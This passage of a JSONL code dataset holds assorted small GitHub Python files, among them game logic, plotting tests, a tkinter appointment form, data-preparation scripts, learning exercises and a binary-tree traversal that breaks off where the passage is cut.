raw_weird_state.lower())\n\n def test_vd_raid_type(self):\n from storrest.storutils import vd_raid_type\n self.assertEqual(vd_raid_type({'raid_level': 'CacheCade1'}),\n 'cachecade')\n self.assertEqual(vd_raid_type({'raid_level': 'NytroCache1'}),\n 'nytrocache')\n\n def test_parse_sector_size(self):\n from storrest.storutils import parse_sector_size\n self.assertEqual(parse_sector_size('512B'), 512)\n self.assertEqual(parse_sector_size('4Kb'), 4096)\n with self.assertRaises(ValueError):\n parse_sector_size('foo bar')\n\n def test_parse_cache_flags_negative(self):\n from storrest.storutils import parse_cache_flags\n\n with self.assertRaises(ValueError):\n parse_cache_flags('foo bar')\n\n with self.assertRaises(ValueError):\n parse_cache_flags('NRWTF')\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"Mirantis/lsi-api","sub_path":"tests/test_storcli.py","file_name":"test_storcli.py","file_ext":"py","file_size_in_byte":28137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71849230867","text":"from Unit import Unit\nfrom Tower import Tower\nfrom HQ import HQ\nfrom Constants import Constants as C\n\nclass Player:\n def __init__(self, id, units, towers, hq, population, capacity, playerMap, initialHQCoord, grids):\n self.id = id\n self.units = units # dictionary\n self.towers = towers # in most cases should be empty first\n self.hqs = hq # list of hq objects\n self.population = population\n self.capacity = capacity\n self.playerMap = playerMap\n self.isDead = False\n self.grids = grids\n self.init_hq(initialHQCoord)\n self.update_vision()\n self.unitId = C.STARTING_UNITS_COUNT\n self.points = 0\n\n\n def add_unit(self, coord):\n newId = len(self.units)\n unit = Unit(newId, self.id, coord, None)\n self.units[newId] = unit\n return newId\n\n\n def init_hq(self, initialHQCoord):\n if(len(self.hqs) != 0):\n return\n hq = HQ(self.id, self.id, initialHQCoord)\n self.hqs.append(hq)\n\n def restart_vision(self):\n self.playerMap = [[C.NOT_VISIBLE for col in range(C.COL)] for row in range(C.ROW)]\n\n def update_vision(self):\n # get coords that are visible for each hq, unit and tower\n # set each coord as visible\n self.restart_vision()\n for i in self.hqs:\n sight = self.grids.cells_within_distance(i.coord, C.HQ_SIGHT_RADIUS)\n for cell in sight:\n self.playerMap[cell[0]][cell[1]]= C.VISIBLE\n for i in self.towers:\n sight = self.grids.cells_within_distance(i.coord, C.TOWER_SIGHT_RADIUS)\n for cell in sight:\n self.playerMap[cell[0]][cell[1]]= C.VISIBLE\n for key, i in self.units.items():\n if(i.isDead):\n continue\n sight = self.grids.cells_within_distance(i.coord, C.UNIT_SIGHT_RADIUS)\n for cell in sight:\n self.playerMap[cell[0]][cell[1]]= C.VISIBLE\n\n def remove_tower(self, towerId):\n removeIndex = 0\n for i in range(len(self.towers)):\n if(self.towers[i].id == towerId):\n removeIndex = i\n break\n self.towers.pop(removeIndex)\n def update_points(self):\n self.points += len(self.hqs) * C.HQ_POINTS + len(self.towers) * C.TOWER_POINTS\n\n def issue_command(self, units, target, arena):\n for id in units:\n self.units[id].target = target\n self.units[id].path = self.grids.bfs(self.units[id].coord, target, self.id, arena)\n self.units[id].pathIndex = 0\n\n\n def kill_unit(self, unitId):\n self.units[unitId].isDead = True\n self.population -= 1\n\n def recalculate_capacity(self):\n self.capacity = len(self.hqs) * C.HQ_POPULATION + len(self.towers) * C.TOWER_POPULATION\n\n def update(self, arena):\n #TODO: Boundary Check\n 
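# The update() method below: refresh capacity from HQs and towers, then
# advance each unit one step toward its target. It prefers the BFS path
# computed in issue_command(), falls back to a DFS recompute when the next
# path cell is blocked, clears the target once a unit has been stuck on the
# same cell for STUCKED_TOLERANCE turns, and finally writes the unit's new
# position into the shared arena grid.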
self.recalculate_capacity()\n for key, unit in self.units.items():\n if(unit.target == None):\n continue\n haveToMove = True\n objectType = arena[unit.target[0]][unit.target[1]][0]\n if(self.grids.isNeighbour(unit.coord, unit.target) and \\\n (objectType == C.HQ or objectType == C.TOWER)):\n haveToMove = False\n if(haveToMove):\n direction = self.grids.get_move(unit.coord, unit.target, self.id, arena)\n newCoord = self.grids.move(unit.coord, direction)\n\n # dfs\n unit = self.units[key]\n # if(not(unit.path != None and len(unit.path) > unit.pathIndex and self.grids.is_free(unit.path[unit.pathIndex], self.id, arena))):\n if(unit.path != None and len(unit.path) > 0 and not self.grids.is_free(unit.path[unit.pathIndex], self.id, arena)):\n self.units[key].path = self.grids.dfs(unit.coord, unit.target, self.id, arena)\n self.units[key].pathIndex = 0\n if(len(unit.path) > unit.pathIndex):\n newCoord = unit.path[unit.pathIndex]\n self.units[key].pathIndex += 1\n\n if(newCoord == self.units[key].prevPos):\n self.units[key].stuckedCounter += 1\n else:\n self.units[key].stuckedCounter = 0\n if(self.units[key].stuckedCounter == C.STUCKED_TOLERANCE):\n self.units[key].target = None\n else:\n self.units[key].prevPos = self.units[key].coord\n self.units[key].coord = newCoord\n if(newCoord[0] < 0 or newCoord[0] >= C.COL or newCoord[1] < 0 or newCoord[1] >= C.ROW):\n continue\n arena[newCoord[0]][newCoord[1]] = [C.UNIT, self.id, key]\n unit.update()\n","repo_name":"cacad-ntu/hnr-server","sub_path":"Player.py","file_name":"Player.py","file_ext":"py","file_size_in_byte":4830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24022833591","text":"def solution(answers):\n grade = [0, 0, 0]\n student1 = [1, 2, 3, 4, 5]\n student2 = [2, 1, 2, 3, 2, 4, 2, 5]\n student3 = [3, 3, 1, 1, 2, 2, 4, 4, 5, 5]\n \n for i, num in enumerate(answers):\n if(student1[i % len(student1)] == num): grade[0] += 1\n if(student2[i % len(student2)] == num): grade[1] += 1\n if(student3[i % len(student3)] == num): grade[2] += 1\n \n maxNum = max(grade)\n answer = list()\n \n for i in range(3):\n if(maxNum == grade[i]):\n answer.append(i + 1)\n \n return answer\n\nprint(solution([1, 2, 3, 4, 5]))","repo_name":"hugh4652/Programmers","sub_path":"레벨 1/모의고사/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19811716740","text":"import boto3\nimport argparse\n\ndef delete_table(table_name, dyn_resource=None):\n \"\"\"\n Deletes the demonstration table.\n\n :param dyn_resource: Either a Boto3 or DAX resource.\n \"\"\"\n if dyn_resource is None:\n dyn_resource = boto3.resource('dynamodb')\n\n table = dyn_resource.Table(table_name)\n table.delete()\n\n print(f\"Deleting {table.name}...\")\n table.wait_until_not_exists()\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description = 'Delete the given DynamoDB table')\n# parser.add_argument(\"-t\", \"--table-name\", help = \"Name of table to delete\")\n parser.add_argument('table')\n args = parser.parse_args()\n\n print(args.table)\n print(\"The table to delete: \" + args.table)\n delete_table(args.table)\n print(\"Table 
deleted!\")","repo_name":"sguillory6/the-complete-sam-workshop-connectors","sub_path":"scripts/delete_table.py","file_name":"delete_table.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40371217127","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 14 08:50:50 2022\nChapitre 18\n@author: remimetzdorff\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\n\nn = 3\nf = .25\nfps = 30\nt = np.linspace(0,1/f, int(1/f * fps))\n\ndef B(t, phi, a=1):\n omega = 2*np.pi*f\n return a * np.cos(omega*t + phi)\n\nfig, ax = plt.subplots(1)\n\nfields = []\nfor i in range(n):\n fields.append(ax.quiver(0, 0, 0, 0, color=\"C\"+str(i), alpha=.5, width=.01, angles='xy', scale_units='xy', scale=1.5))\nfield_rot = ax.quiver(0, 0, 0, 0, alpha=1, width=.01, angles='xy', scale_units='xy', scale=1.5)\n\nax.set_xlim(-1,1)\nax.set_ylim(-1,1)\nax.set_aspect(\"equal\")\nplt.axis(\"off\")\n\nscale=1\nif n>1:\n scale = 2/n\ndef animate(i):\n Bxtot, Bytot = 0, 0\n for k, field in enumerate(fields):\n alpha = k*np.pi/n\n phi = -k*np.pi/n\n Bx = B(t[i], phi, a=scale) * np.cos(alpha)\n By = B(t[i], phi, a=scale) * np.sin(alpha)\n field.set_UVC(Bx,By)\n Bxtot += Bx\n Bytot += By\n field_rot.set_UVC(Bxtot,Bytot)\n return\n\nani = animation.FuncAnimation(fig, animate, frames=len(t), interval=1e3/fps)\nplt.show()","repo_name":"remimetzdorff/mp2i","sub_path":"python/chap18-champ_tournant.py","file_name":"chap18-champ_tournant.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"33751466135","text":"import random, time\n\natributos = {\"fuerza\": 0, \"destreza\": 0, \"resistencia\": 0, \"inteligencia\": 0, \"percepcion\": 0, \"carisma\": 0}\nhabilidades = {}\n\ntiradas1 = 0\ntiradas2 = 0\ntiradas3 = 0\ntiradas4 = 0\ntiradas5 = 0\ntiradas6 = 0\ntiradas7 = 0\ntiradas8 = 0\ntiradas9 = 0\ntiradas10 = 0\n\nvaloresMedios = []\n\n\ndef generarAtributos():\n charValue = 0\n for x in atributos:\n atributos[x] = random.randrange(1, 11)\n charValue += atributos[x]\n print(x + \": \" + str(atributos[x]))\n # guardamos el numero de tiradas de cada valor\n if atributos[x] == 1:\n global tiradas1\n tiradas1 += 1\n elif atributos[x]==2:\n global tiradas2\n tiradas2 += 1\n elif atributos[x]==3:\n global tiradas3\n tiradas3 += 1\n elif atributos[x]==4:\n global tiradas4\n tiradas4 += 1\n elif atributos[x]==5:\n global tiradas5\n tiradas5 += 1\n elif atributos[x]==6:\n global tiradas6\n tiradas6 += 1\n elif atributos[x]==7:\n global tiradas7\n tiradas7 += 1\n elif atributos[x]==8:\n global tiradas8\n tiradas8 += 1\n elif atributos[x]==9:\n global tiradas9\n tiradas9 += 1\n elif atributos[x]==10:\n global tiradas10\n tiradas10 += 1\n else:\n print(\"error\")\n print(atributos)\n print(\"Character Value: \" + str(charValue) + \"/60\")\n valoresMedios.append(charValue)\n\n\ndef generarHabilidades():\n x = \"Empty\"\n while x != \"end\":\n x = input(\"Escribe una habilidad (end para finalizar)\")\n if x != \"end\":\n habilidades[x] = 0\n print(habilidades)\n\n\nti = time.time()\nfor x in range(0, 10000):\n generarAtributos()\n\ntf = time.time()\nprint(\"Tiempo: \" + str(int(tf - ti)) + \"s\")\nvaloresMedios.sort()\nfor x in range(6, 61):\n count = 0\n for y in valoresMedios:\n if x == y:\n count += 1\n print(\"Hay \" + str(count) + \" \" + str(x))\nprint(\"Hay 
\"+str(tiradas1)+\" unos\")\nprint(\"Hay \"+str(tiradas2)+\" doses\")\nprint(\"Hay \"+str(tiradas3)+\" treses\")\nprint(\"Hay \"+str(tiradas4)+\" cuatros\")\nprint(\"Hay \"+str(tiradas5)+\" cincos\")\nprint(\"Hay \"+str(tiradas6)+\" seises\")\nprint(\"Hay \"+str(tiradas7)+\" sietes\")\nprint(\"Hay \"+str(tiradas8)+\" ochos\")\nprint(\"Hay \"+str(tiradas9)+\" nueves\")\nprint(\"Hay \"+str(tiradas10)+\" dieces\")\nprint(\"Se han realizado \"+str((tiradas1+tiradas2+tiradas3+tiradas4+tiradas5+tiradas6+tiradas7+tiradas8+tiradas9+tiradas10))+\" tiradas\")\n# print(valoresMedios)\n","repo_name":"omartorrado/EjemplosDeUsoPython","sub_path":"CharCreation.py","file_name":"CharCreation.py","file_ext":"py","file_size_in_byte":2596,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32004246652","text":"import argparse\n\nimport numpy as np\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--gts\",\n type=str,\n required=True,\n help=\"path to genotypes\",\n )\n parser.add_argument(\n \"--output\",\n type=str,\n required=True,\n help=\"path to output mmap\",\n )\n return parser.parse_args()\n\n\ndef load_gts(gts_path: str):\n gts = []\n with open(gts_path, \"r\") as f:\n for line in f:\n A = line.rstrip().split()\n gts.append(np.array([int(x) for x in A[1:]], dtype=np.int8)) # skip sample\n return np.array(gts, dtype=np.int8)\n\n\ndef make_memmaps(arr: np.ndarray, output: str):\n \"\"\"Write the gts array to a memory-mapped file.\"\"\"\n gts_mmap = np.memmap(output, dtype=np.int8, mode=\"w+\", shape=arr.shape)\n gts_mmap[:] = arr[:]\n gts_mmap.flush()\n\n\ndef main(gts: str, output: str):\n arr = load_gts(gts)\n make_memmaps(arr, output)\n\n\nif __name__ == \"__main__\":\n args = parse_args()\n main(**vars(args))\n","repo_name":"kristen-schneider/precision-medicine","sub_path":"pytorch/exploration/make_gt_mmap.py","file_name":"make_gt_mmap.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19902848486","text":"def replace(self, old, new):\n while old in self:\n self[self.index(old)] = new\n\n\nAdvancedList = type('AdvancedList', (list, ), {'desc': '향상된 리스트', 'replace': replace})\n\nx = AdvancedList([1, 2, 3, 1, 2, 3, 1, 2, 3])\nx.replace(1, 100)\n\nprint(x)\nprint(x.desc)\n\n\nclass MakeCalc(type):\n def __new__(mcs, name, bases, namespace):\n namespace['desc'] = '계산 클래스'\n namespace['add'] = lambda self, a, b: a + b\n return type.__new__(mcs, name, bases, namespace)\n\n\nCalc = MakeCalc('Calc', (), {})\nc = Calc()\nprint(c.desc)\nprint(c.add(1, 2))\n\n\n","repo_name":"giinie/CSBootcamp","sub_path":"src/learn_python_the_right_way/unit_47/metaclass.py","file_name":"metaclass.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12447007844","text":"import sys; sys.path.insert(0, \"..\") # noqa\nfrom pathlib import Path\nfrom unittest import TestCase, main\n\nfrom dkit.etl import source\nfrom dkit.plot import ggrammar\nfrom dkit.plot.gnuplot import BackendGnuPlot\nfrom dkit.plot.matplotlib import MPLBackend\nfrom dkit.plot.plotly import PlotlyBackend\nfrom dkit.utilities.file_helper import yaml_load\nfrom sample_data import plot_data, scatter_data, histogram_data, control_chart_data, gapminder\n\n\nwith open(\"stylesheet.yaml\", \"rt\") as infile:\n style_sheet = yaml_load(infile)\n\n\nclass 
AbstractPlot(object):\n\n @classmethod\n def setUpClass(cls):\n out_path = Path.cwd() / \"plots\"\n if not out_path.exists():\n print(\"Creating plots folder\")\n out_path.mkdir()\n cls.out_path = out_path\n\n def gen_plt(self, data):\n plt = ggrammar.Plot(data) \\\n + ggrammar.Title(\"2018 Sales\") \\\n + ggrammar.YAxis(\"Rand\") \\\n + ggrammar.XAxis(\"Month\", rotation=70) \\\n + ggrammar.Aesthetic(stacked=True, width=15, height=10)\n\n return plt\n\n def test_area_plot(self):\n \"\"\"test area plot\"\"\"\n plt = self.gen_plt(plot_data)\n plt += ggrammar.GeomArea(\"Revenue\", \"index\", \"revenue\", color=\"#0000FF\", alpha=0.8)\n self.render(plt, \"area_plot.svg\")\n\n def test_bar_plot(self):\n \"\"\"test bar plots\"\"\"\n plt = self.gen_plt(plot_data)\n plt += ggrammar.GeomBar(\"Revenue\", \"index\", \"revenue\", alpha=0.6)\n self.render(plt, \"bar_plot.svg\")\n\n def test_line_plot(self):\n \"\"\"test bar plots\"\"\"\n plt = self.gen_plt(plot_data)\n plt += ggrammar.GeomLine(\"Revenue\", \"index\", \"revenue\", alpha=0.6)\n self.render(plt, \"line_plot.svg\")\n\n def test_scatter_plot(self):\n \"\"\"test scatter plot\"\"\"\n plt = ggrammar.Plot(scatter_data) \\\n + ggrammar.GeomScatter(\"Scatter Plot\", \"x\", \"y\", alpha=0.6) \\\n + ggrammar.Title(\"Random Scatter Plot\") \\\n + ggrammar.YAxis(\"Random Y\") \\\n + ggrammar.XAxis(\"Random X\", rotation=70)\n\n self.render(plt, \"scatter_plot.svg\")\n\n def test_histogram_plot(self):\n \"\"\"test histogram plot\"\"\"\n plt = ggrammar.Plot(histogram_data) \\\n + ggrammar.GeomHistogram(\"random data\") \\\n + ggrammar.Title(\"Random Data Histogram\") \\\n + ggrammar.YAxis(\"Frequency\") \\\n + ggrammar.XAxis(\"bin\")\n self.render(plt, \"histogram_plot.svg\")\n\n def test_slope_plot(self):\n if self.__class__.__name__ in [\"TestMatplotlib\"]:\n with source.load(\"input_files/slope.jsonl\") as src:\n data = list(src)\n plt = ggrammar.Plot(data) \\\n + ggrammar.GeomSlope(\n \"Slope Plot example\",\n \"continent\",\n \"year\",\n \"value\"\n ) + ggrammar.YAxis(\"Value\")\n\n self.render(plt, \"slope_plot.svg\")\n\n\nclass TestGnuPlot(AbstractPlot, TestCase):\n\n def render(self, plt, file_name):\n BackendGnuPlot(\"svg\").render(\n plt.as_dict(),\n file_name=self.out_path / f\"gnuplot_{file_name}\"\n )\n\n\nclass TestMatplotlib(AbstractPlot, TestCase):\n\n def test_fill_plot(self):\n \"\"\"test fill plot\"\"\"\n plt = self.gen_plt(control_chart_data)\n plt += ggrammar.GeomFill(\n \"Control Chart\",\n x_data=\"index\",\n y_upper=\"upper\",\n y_lower=\"lower\"\n )\n self.render(plt, \"fill_plot.svg\")\n\n def render(self, plt, filename):\n MPLBackend(\"svg\", style_sheet=style_sheet).render(\n plt.as_dict(),\n file_name=self.out_path / f\"mpl_{filename}\"\n )\n\n\nclass TestPlotly(AbstractPlot, TestCase):\n\n def render(self, plt, filename):\n PlotlyBackend(\"svg\", style_sheet=style_sheet).render(\n plt.as_dict(),\n file_name=self.out_path / f\"plotly_{filename}\"\n )\n\n def _test_treemap(self):\n \"\"\"test fill plot\"\"\"\n plt = ggrammar.Plot(gapminder) \\\n + ggrammar.Title(\"Population\") \\\n + ggrammar.GeomTreeMap(\n path=[\"continent\", \"country\"],\n size_field=\"pop\",\n color_field=\"lifeExp\"\n )\n self.render(plt, \"treemap_plot.svg\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"cobusn/dkit","sub_path":"test/test_plot.py","file_name":"test_plot.py","file_ext":"py","file_size_in_byte":4353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} 
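A minimal usage sketch of the plot grammar that the test suite above exercises: a specification is composed by adding grammar objects to a Plot, serialized with as_dict(), and handed to a backend. It reuses only names that already appear in the tests (ggrammar.Plot, GeomBar, Title, YAxis, XAxis, MPLBackend); the data rows are invented for illustration, and treating style_sheet as optional is an assumption.

from dkit.plot import ggrammar
from dkit.plot.matplotlib import MPLBackend

# Invented sample rows, shaped like the plot_data the tests import.
rows = [{"index": "Jan", "revenue": 10.0},
        {"index": "Feb", "revenue": 12.5},
        {"index": "Mar", "revenue": 9.8}]

spec = ggrammar.Plot(rows) \
    + ggrammar.GeomBar("Revenue", "index", "revenue", alpha=0.6) \
    + ggrammar.Title("Quarterly Sales") \
    + ggrammar.YAxis("Rand") \
    + ggrammar.XAxis("Month")

# Render as the tests do; omitting style_sheet assumes it is optional.
MPLBackend("svg").render(spec.as_dict(), file_name="bar_plot.svg")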
+{"seq_id":"70466959185","text":"\nfrom tkinter import *\nfrom tkinter import ttk\nfrom tkinter import messagebox\nfrom tkcalendar import *\nimport datetime\n\nfrom Backend.backend_db import Database\nfrom Directories.save_appointments import *\n\ndatabase=Database(\"Metra.db\")\n\n\nclass Appointment:\n def __init__(self, master, employeeId, customerName, customerId):\n self.master=master\n self.employeeId=employeeId\n self.customerName = customerName\n self.customerId = customerId\n self.created_at = datetime.datetime.now()\n\n self.year = datetime.date.today().year\n self.month = datetime.date.today().month\n self.day = datetime.date.today().day\n \n\n \n\n \n \n master.title('Create Appointment')\n # master.resizable(False, False)\n master.geometry('800x800')\n master.configure(background = '#e1d8b9')\n self.frame_header = ttk.Frame(master)\n self.frame_header.pack()\n\n ttk.Label(self.frame_header, text = \"Make an appointment\").grid(row=0, column =1)\n self.frame_content = ttk.Frame(master)\n self.frame_content.pack()\n\n ttk.Label(self.frame_content, text = 'Customer Name:').grid(row = 0, column = 0)\n self.entry_customerName = ttk.Entry(self.frame_content, width = 24, font = ('Arial', 14)) \n self.entry_customerName.grid(row = 0, column = 1, padx=5)\n ttk.Label(self.frame_content, text = 'Phone No:').grid(row = 1, column = 0)\n self.entry_customerId = ttk.Entry(self.frame_content, width = 24, font = ('Arial', 14)) \n self.entry_customerId.grid(row = 1, column = 1, padx=5)\n\n \n \n\n ttk.Label(self.frame_content, text = 'Date:').grid(row = 3, column = 0)\n self.cal = Calendar(self.frame_content, date_pattern=\"dd-mm-y\",showweeknumbers=False, foreground='black', background='blue', font=(14),selectedmode=\"day\", year=self.year, month=self.month, day=self.day)\n self.cal.grid(row = 3, column=1, padx=5)\n \n \n # self.entry_app_date = ttk.Entry(self.frame_content, width = 24, font = ('Arial', 14)) \n # self.entry_app_date.grid(row = 1, column = 2, padx = 5)\n\n ttk.Label(self.frame_content, text = 'Employee Id: ').grid(row = 4, column = 0)\n\n # -----------Select from Combobox-------------------\n self.employee_Id = StringVar()\n self.employee_Id_cb = ttk.Combobox(self.frame_content, textvariable=self.employee_Id)\n self.employee_Id_cb.grid(row=4, column=1, padx=5)\n # --------Add values to the combobox-----\n self.employee_Id_cb.config(values = ('Architect', 'Structural', 'Inspector'))\n # self.payment_type.get() #to get the chosen value\n \n \n ttk.Button(self.frame_content, text = 'Save',\n command = self.submit).grid(row = 8, column = 0, padx = 5, pady = 5, sticky = 'e')\n \n def submit(self): \n \n self.customerId = self.entry_customerId.get()\n database.insert_appointment(self.employeeId, self.entry_customerId.get(), self.entry_customerName.get(), self.cal.get_date())\n print(self.cal.get_date())\n # database.insert_appointment(self.employeeId, self.customerId, self.entry_customerName.get(), self.entry_app_date.get())\n make_output_dir(self.customerId)\n save_customer_appointments(self.employee_Id.get(), self.entry_customerId.get(), self.entry_customerName.get(), self.cal.get_date())\n messagebox.showinfo(title = \"Appointment\", message = \"Appointment Submited!\")\n self.close_window()\n def close_window(self):\n self.master.destroy()\n 
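The Appointment form above reads the employee selection through a StringVar bound to a ttk.Combobox. Here is a self-contained sketch of that read pattern using only the standard-library tkinter API; the combobox values are copied from the form, and the rest of the window is a stand-in.

from tkinter import Tk, StringVar, ttk

root = Tk()
choice = StringVar()
combo = ttk.Combobox(root, textvariable=choice)
combo.config(values=('Architect', 'Structural', 'Inspector'))  # values from the form
combo.current(0)  # preselect the first entry
combo.pack(padx=10, pady=10)

# choice.get() returns the current selection, the same read used by
# self.employee_Id.get() in the form's submit handler.
ttk.Button(root, text='Save', command=lambda: print(choice.get())).pack(pady=5)
root.mainloop()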
\n\n\n\n\n\n\n","repo_name":"zelal-Eizaldeen/gui-os","sub_path":"Appointment/appointment_template.py","file_name":"appointment_template.py","file_ext":"py","file_size_in_byte":3387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8495895346","text":"import os\nimport argparse\nimport time\nimport tensorflow as tf\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-d\", \"--dataset\", choices=[\"cifar10\"], required=True, help=\"dataset to create\") # , \"imagenet1k\"\n # parser.add_argument(\"-p\", \"--path\", help=\"path to imagenet\")\n parser.add_argument(\"-w\", \"--write-dir\", default=\"tfrecords/\", help=\"path to write TFRecords\")\n \n cfg = parser.parse_args()\n\n print(cfg)\n\n wpath = os.path.join(cfg.write_dir, cfg.dataset)\n\n if not os.path.isdir(wpath):\n os.makedirs(wpath)\n\n if cfg.dataset == \"cifar10\":\n cifar10(wpath)\n elif cfg.dataset == \"imagenet1k\":\n raise NotImplementedError(\"imagenet1k not implemented\")\n\n\ndef cifar10(path):\n print(\"Loading CIFAR10\")\n (train_images, train_labels), (test_images, test_labels) = tf.keras.datasets.cifar10.load_data()\n tf.constant([2])\n\n\n start = time.perf_counter()\n print(\"Serializing Train Batch\")\n\n with tf.io.TFRecordWriter(os.path.join(path, \"train.tfrecord\")) as writer:\n data = tf.train.Example(\n features = tf.train.Features(\n feature = {\n \"imgs\": tf.train.Feature(bytes_list=tf.train.BytesList(value=[ tf.io.serialize_tensor(train_images).numpy() ])),\n \"labels\": tf.train.Feature(bytes_list=tf.train.BytesList(value=[ tf.io.serialize_tensor(train_labels).numpy() ]))\n }\n )\n )\n\n print(\"Writing to TFRecord file\")\n writer.write(\n data.SerializeToString()\n )\n\n \n with tf.io.TFRecordWriter(os.path.join(path, \"val.tfrecord\")) as writer:\n print(\"Serializing Validation Batch\")\n data = tf.train.Example(\n features = tf.train.Features(\n feature = {\n \"imgs\": tf.train.Feature(bytes_list=tf.train.BytesList(value=[ tf.io.serialize_tensor(test_images).numpy() ])),\n \"labels\": tf.train.Feature(bytes_list=tf.train.BytesList(value=[ tf.io.serialize_tensor(test_labels).numpy() ])),\n }\n )\n )\n\n print(\"Writing to TFRecord file\")\n writer.write(\n data.SerializeToString()\n )\n\n elapsed = time.perf_counter() - start\n print('Elapsed %.3f seconds.' 
% elapsed)\n\n\n\nif __name__ == \"__main__\":\n os.environ['TF_CPP_MIN_LOG_LEVEL'] = '1'\n main()\n","repo_name":"MoonArchitect/tensorflow-CNNs","sub_path":"prepare_dataset.py","file_name":"prepare_dataset.py","file_ext":"py","file_size_in_byte":2402,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"30914648561","text":"from IPython.display import clear_output\n\ndef display_board(board):\n clear_output()\n print(f' {board[7]} | {board[8]} | {board[9]} ')\n print(f' {board[4]} | {board[5]} | {board[6]} ')\n print(f' {board[1]} | {board[2]} | {board[3]} ')\n\ntest_board = ['#','X','O','X','O','X','O','X','O','X']\ndisplay_board(test_board)\n\ndef player_input():\n \n marker = \"\"\n while marker != \"X\" and marker != \"O\":\n market = input(\"Player 1: Choose X or O: \").upper()\n\n if market == \"X\":\n return (\"X\", \"O\")\n else:\n return (\"O\",\"X\")\n \ndef place_marker(board, marker, position):\n \n board[position] = marker\n\nprint(test_board)\nplace_marker(test_board,'$',8)\ndisplay_board(test_board)\n","repo_name":"oguzcanaygun/TicTacToe","sub_path":"tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34680250435","text":"__author__ = 'Vivek Gour'\n__copyright__ = 'Copyright 2018, Vivek Gour'\n__version__ = '1.0.0'\n__maintainer__ = 'Vivek Gour'\n__email__ = 'Viv30ek@gmail.com'\n__status__ = 'Learning'\n\n\"\"\"\nPython List Methods\nappend() - Add an element to the end of the list\nextend() - Add all elements of a list to the another list\ninsert() - Insert an item at the defined index\nremove() - Removes an item from the list\npop() - Removes and returns an element at the given index\nclear() - Removes all items from the list\nindex() - Returns the index of the first matched item\ncount() - Returns the count of number of items passed as an argument\nsort() - Sort items in a list in ascending order\nreverse() - Reverse the order of items in the list\ncopy() - Returns a shallow copy of the list\n\nFunction\tDescription\nall()\tReturn True if all elements of the list are true (or if the list is empty).\nany()\tReturn True if any element of the list is true. If the list is empty, return False.\nenumerate()\tReturn an enumerate object. It contains the index and value of all the items of list as a tuple.\nlen()\tReturn the length (the number of items) in the list.\nlist()\tConvert an iterable (tuple, string, set, dictionary) to a list.\nmax()\tReturn the largest item in the list.\nmin()\tReturn the smallest item in the list\nsorted()\tReturn a new sorted list (does not sort the list itself).\nsum()\tReturn the sum of all elements in the list.\n\nLists are allocated in two blocks: the fixed one with all the Python object information and a variable sized block for\nthe data. It is the reason creating a tuple is faster than List. 
It also explains the slight difference in indexing \nspeed is faster than lists, because in tuples for indexing it follows fewer pointers.\n\"\"\"\n\n# revers string using slicing\na = [1, 2, 3, 4]\nprint(a[::-1])\nprint(a[::-2])\n# print(a[::0]) # ValueError: slice step cannot be zero\nprint(a[0::])\n# list Comprehension\n\npow2 = [2 ** x for x in range(10)]\nprint(pow2)\n","repo_name":"vivek-gour/Python-Design-Patterns","sub_path":"dataTypes/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"7915700153","text":"# Driving is expensive. Write a program with a car's miles/gallon and gas dollars/gallon (both floats) as input, and output the gas cost for 10 miles, 50 miles, and 400 miles.\n\n# Output each floating-point value with two digits after the decimal point, which can be achieved as follows:\n# print('%0.2f %0.2f %0.2f' % (your_value1, your_value2, your_value3))\n\n# Ex: If the input is:\n\n# 20.0\n# 3.1599\n# Then the output is:\n\n# 1.58 7.90 63.20\n# Note: Real per-mile cost would also include maintenance and depreciation.\n\n#---- \n\n# car miles per gallon\n# gas dollar per gallon (both floats)\n# cost 10,50,400 miles\n\nmilesPerGallon = float(input())\ndollarsPerGallon = float(input())\n\nmiles_10 = (10 / milesPerGallon) * dollarsPerGallon\nmiles_50 = (50 / milesPerGallon) * dollarsPerGallon\nmiles_400 = (400 / milesPerGallon) * dollarsPerGallon\n\nprint('%0.2f %0.2f %0.2f' % (miles_10, miles_50, miles_400))","repo_name":"0xzt/Python","sub_path":"Chapter 4/driving_costs.py","file_name":"driving_costs.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"69815101586","text":"# Binary Tree node\nclass Node:\n def __init__(self, data):\n self.data = data\n self.left = None\n self.right = None\n\n# Function to print the zigzag traversal\ndef zigZagTraversal(root):\n q = deque([])\n v = []\n q.append(root)\n v.append(root.data)\n \n # set initial level as 1, because root is\n # already been taken care of.\n l = 1\n \n while len(q) > 0:\n n = 